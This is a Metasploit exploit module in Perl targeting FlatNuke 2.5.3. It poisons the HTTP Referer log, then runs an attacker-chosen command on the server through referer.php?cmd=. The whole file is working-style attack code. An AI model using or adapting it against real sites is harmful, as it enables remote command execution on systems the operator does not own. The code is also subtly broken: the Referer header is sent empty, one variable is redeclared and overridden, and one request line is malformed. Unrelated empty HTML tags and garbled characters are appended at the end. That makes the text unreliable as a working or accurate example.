## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::flatnuke_253_referer; use strict; use base 'Msf::Exploit'; use Msf::Socket::Tcp; use Pex::Text; my $advanced = { }; my $info = { 'Name' => 'FlatNuke 2.5.3 Referer Poisoning', 'Version' => '$Revision: 1.1 $', 'Authors' => [ 'http://arkanoid.altervista.org - arkanoid@altervista.org', ], 'Arch' => [ ], 'OS' => [ ], 'Priv' => 0, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 80], 'HOSTNAME' => [1, '', 'Hostname', 'localhost'], 'DIR' => [1, '', 'Flatnuke\'s directory', '/flatnuke/'], 'CMD' => [1, '', 'Default command', 'dir'], }, 'Description' => Pex::Text::Freeform(qq{ FlatNuke 2.5.3 HTTP Referer Poisoning }), 'Refs' => [ ], }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $targetHost = $self->GetVar('RHOST'); my $targetPort = $self->GetVar('RPORT'); my $targetHost = $self->GetVar('HOSTNAME'); my $targetDir = $self->GetVar('DIR'); # my $targetCmd = uri_escape($self->GetVar('CMD')); my $targetCmd = $self->GetVar('CMD'); my $sock = Msf::Socket::Tcp->new( 'PeerAddr' => $targetHost, 'PeerPort' => $targetPort, ); if($sock->IsError) { $self->PrintLine('Error creating socket: ' . $sock->GetError); return; } my $buf="GET $targetDir HTTP/1.1\n"; $buf.="Host: $targetHost\n"; $buf.="Referer: \n\n"; $sock->Send($buf); my $r=$sock->Recv(-1); if ($r =~ /200 OK/) { $self->Print("[+] Poisoned!\n"); $self->Print("[*] Try to exec command...!\n"); $buf="GET $targetDir"; $buf.="misc/flatstat/referer.php?cmd=$targetCmd\n"; $buf.="Host: $targetHost\n\n"; $sock->Send($buf); $r=$sock->Recv(-1); #print $buf; print $r; } else { $self->PrintLine("[+] Failed!\n"); } return; } 1;
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß